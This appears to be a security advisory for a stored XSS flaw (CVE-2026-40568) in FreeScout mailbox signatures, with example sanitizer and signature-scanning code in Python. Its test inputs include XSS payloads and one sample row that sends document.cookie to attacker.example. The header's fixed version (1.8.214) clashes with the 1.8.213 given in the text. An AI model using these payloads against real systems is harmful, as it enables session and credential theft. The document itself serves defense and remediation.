Platform
php
Component
freescout-help-desk
Fixed in
1.8.214
CVE-2026-40568 describes a stored cross-site scripting (XSS) vulnerability in FreeScout, a free self-hosted help desk and shared mailbox application. It allows an attacker who can edit a mailbox signature to store script that then runs in the browsers of other FreeScout users, potentially leading to account compromise and data theft. The issue affects versions 1.0.0 through 1.8.212; a patch is available in version 1.8.213.
The vulnerability is caused by insufficient sanitization of the HTML FreeScout accepts for a mailbox signature. Helper::stripDangerousTags() works from a short blocklist of tag names: it removes the tags it knows to be dangerous, but it does not strip event-handler attributes (onerror, onload, ontoggle and the like), so tags that are not on the list, such as <img>, <svg> and <details>, can carry JavaScript that executes whenever the signature is rendered. A successful exploit runs attacker-chosen JavaScript in the browser of any FreeScout user who views the signature, which can be used for session hijacking, credential theft, redirection to malicious websites, or defacement of the FreeScout interface. Signatures are also embedded in outgoing email, so the injected markup reaches recipients outside FreeScout; in practice, however, mainstream mail clients do not execute scripts or event handlers in HTML mail, so the FreeScout web session of a logged-in user is the realistic execution context.
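To make the blocklist-versus-allowlist point concrete, here is an added Python illustration. It is not FreeScout's code (FreeScout is written in PHP, and its real Helper::stripDangerousTags() is not reproduced here): the first function mimics a tag-name blocklist, the second keeps only an allowlist of tags and attributes and rejects event handlers and unsafe URL schemes. The allowed-tag set and the payloads are constructed for the example.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# --- Blocklist approach (illustrative, not FreeScout's real implementation) ---
# Only the tag names below are removed; event-handler attributes on any other
# tag (img, svg, details, a, ...) pass straight through.
BLOCKED_TAGS = ("script", "iframe", "object", "embed", "style")

def strip_dangerous_tags_blocklist(markup: str) -> str:
    for tag in BLOCKED_TAGS:
        # drop whole <tag ...>...</tag> elements, then any stray open/close tags
        markup = re.sub(rf"<{tag}\b[^>]*>.*?</{tag}\s*>", "", markup, flags=re.I | re.S)
        markup = re.sub(rf"</?{tag}\b[^>]*>", "", markup, flags=re.I)
    return markup

# --- Allowlist approach: keep only known tags and known attributes ---
ALLOWED_TAGS = {
    "p": set(), "br": set(), "div": set(), "span": set(),
    "b": set(), "i": set(), "strong": set(), "em": set(),
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" means a relative URL
# elements whose text content is dropped as well, not just the tag
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed", "noscript"}

def _safe_url(value: str) -> bool:
    # Browsers ignore tab/newline and leading whitespace inside a URL, so
    # "java\tscript:" has to be normalised before the scheme is checked.
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES

class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__()  # convert_charrefs=True: text arrives decoded, we re-escape it
        self.out: list[str] = []
        self._open: list[str] = []  # allowed non-void tags awaiting their close tag
        self._skip_depth = 0        # >0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth += 1
            return
        if tag in DROP_CONTENT_TAGS:
            self._skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag removed; its text content is still emitted, escaped
        kept = []
        for name, value in attrs:  # HTMLParser already lowercases names and decodes values
            value = value or ""
            if name not in ALLOWED_TAGS[tag]:
                continue  # on* handlers are never allowlisted, so they are dropped here
            if name in URL_ATTRS and not _safe_url(value):
                continue  # javascript:, data:, vbscript: ... are all rejected
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_CONTENT_TAGS:
                self._skip_depth -= 1
            return
        if tag in self._open:
            while True:  # also closes anything left open inside this element
                top = self._open.pop()
                self.out.append(f"</{top}>")
                if top == tag:
                    break

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()  # flushes buffered text
        while self._open:  # balance any tags the input left open
            self.out.append(f"</{self._open.pop()}>")

def sanitize_signature_allowlist(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)

# Constructed inputs: the three tag families named in the advisory, two
# URL-based variants, a <script> tag and a benign signature.
PAYLOADS = {
    "img onerror": '<img src=x onerror="alert(1)">',
    "svg onload": '<svg onload="alert(1)"><circle r="1"/></svg>',
    "details ontoggle": '<details open ontoggle="alert(1)">hi</details>',
    "javascript href": '<a href="javascript:alert(1)">click</a>',
    "entity-encoded href": '<a href="java&#x73;cript:alert(1)">click</a>',
    "script tag": "<script>alert(1)</script>",
}
BENIGN = '<p>Kind regards,<br><b>Support</b> &amp; <a href="https://example.com">team</a></p>'
```

Run the payloads through both functions: the blocklist leaves every entry except the bare <script> untouched, while the allowlist reduces them to `<img src="x">`, an empty string, plain `hi`, and `<a>click</a>`, and returns the benign signature unchanged. The entity-encoded case shows why the check must run on decoded attribute values, which HTMLParser provides.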
CVE-2026-40568 was publicly disclosed on 2026-04-21. No public proof-of-concept exploit is known at the time of writing, and the EPSS score listed below is low (0.03%). Stored XSS is nonetheless straightforward to exploit once an attacker has the access needed to set a signature, and the payload fires against every user who views it, so the vulnerability warrants prompt remediation.
Exploit Status
EPSS: 0.03% (10th percentile)
CISA SSVC: none listed
CVSS Vector: none listed
The primary mitigation for CVE-2026-40568 is to upgrade FreeScout to version 1.8.213 or later, which includes the sanitization fix. If upgrading is not immediately feasible, a Web Application Firewall (WAF) rule that rejects on*= attributes and javascript:/data: URLs in the mailbox-signature form submission reduces exposure, but a WAF is a stopgap that encoding tricks can bypass, not a fix. Restrict which accounts may manage mailbox settings and signatures to limit who can plant a payload. Review the signatures already stored on each mailbox for unexpected HTML (event-handler attributes, <svg>, <details>, javascript: links), since a payload injected before the upgrade is still stored data, and confirm it renders safely after the upgrade; also monitor FreeScout's logs and mailbox settings for signature changes you did not expect. After upgrading, verify the fix with payloads that exercise the event-handler path rather than a bare <script> tag, which the old blocklist already removed: for example <img src=x onerror=alert(1)>, <svg onload=alert(1)> and <details open ontoggle=alert(1)>. Save the signature, reopen the mailbox settings and a conversation in that mailbox, and confirm that no alert fires and that the stored markup no longer contains the on* attributes.
Update FreeScout to version 1.8.213 or higher to close the XSS vulnerability. This version fixes the HTML sanitization of mailbox signatures so that event-handler attributes are removed and only allowed HTML tags are kept.
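As an added example of the "review the signatures already stored" step (example code, not part of the advisory or of FreeScout), the following Python script scans signature HTML for indicators that no legitimate signature needs. The rows are constructed; how you export real ones (for instance from the FreeScout database) is left to you, since the page does not describe the schema. The patterns are a hunting heuristic to be reviewed by hand, not a sanitizer.

```python
import re
from html import unescape

# Patterns a legitimate signature has no reason to contain.
INDICATORS = [
    ("event handler attribute",
     re.compile(r"<[^>]*\s+on[a-z]+\s*=", re.I)),
    ("script URL scheme",
     re.compile(r"""\b(href|src|action|formaction|xlink:href)\s*=\s*['"]?\s*(javascript|vbscript|data)\s*:""", re.I)),
    ("tag outside the signature vocabulary",
     re.compile(r"<\s*(script|svg|iframe|object|embed|math|details|style|base|meta|form)\b", re.I)),
]

def scan_signature(signature: str) -> list[str]:
    """Return a list of 'label: matched text' strings, empty if nothing looks wrong."""
    # Decode entities first so that java&#x73;cript: is seen as javascript:,
    # then drop the control characters browsers ignore inside URLs and attributes.
    text = re.sub(r"[\x00-\x1f]", "", unescape(signature))
    hits = []
    for label, pattern in INDICATORS:
        match = pattern.search(text)
        if match:
            hits.append(f"{label}: {match.group(0).strip()!r}")
    return hits

def scan_signatures(rows):
    """rows: iterable of (mailbox, signature_html). Returns {mailbox: hits} for suspicious rows only."""
    findings = {}
    for mailbox, signature in rows:
        hits = scan_signature(signature or "")
        if hits:
            findings[mailbox] = hits
    return findings

# Constructed sample rows, not real data: one clean signature and three
# planted payloads matching the tag families named in the advisory.
SAMPLE_ROWS = [
    ("support@example.com",
     '<p>Kind regards,<br><b>Support Team</b><br><a href="https://example.com">example.com</a></p>'),
    ("sales@example.com",
     '<img src=x onerror=fetch("//attacker.example/?c="+document.cookie)>'),
    ("billing@example.com",
     '<a href="java&#x73;cript:alert(document.domain)">Billing</a>'),
    ("info@example.com",
     '<details open ontoggle=alert(1)>Info</details>'),
]

if __name__ == "__main__":
    for mailbox, hits in scan_signatures(SAMPLE_ROWS).items():
        print(mailbox)
        for hit in hits:
            print("   ", hit)
```

On the sample rows the clean support@ signature produces no findings, sales@ and info@ are flagged for event-handler attributes (info@ additionally for the <details> tag), and billing@ is flagged for the javascript: scheme only after entity decoding, which is why the decode happens before matching. Any real hit should be compared against what the mailbox owner actually configured before it is treated as an intrusion.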
CVE-2026-40568 is a stored cross-site scripting (XSS) vulnerability in FreeScout versions 1.0.0 through 1.8.212, allowing attackers to inject malicious scripts via mailbox signatures.
You are affected if you are running FreeScout versions 1.0.0 through 1.8.212. Verify your version and upgrade immediately if vulnerable.
Upgrade FreeScout to version 1.8.213 or later to resolve the vulnerability. Consider WAF rules as a temporary mitigation.
As of the current disclosure date, there are no confirmed reports of active exploitation, but the vulnerability's ease of exploitation warrants caution.
Refer to the FreeScout security advisory on their official website or GitHub repository for detailed information and updates.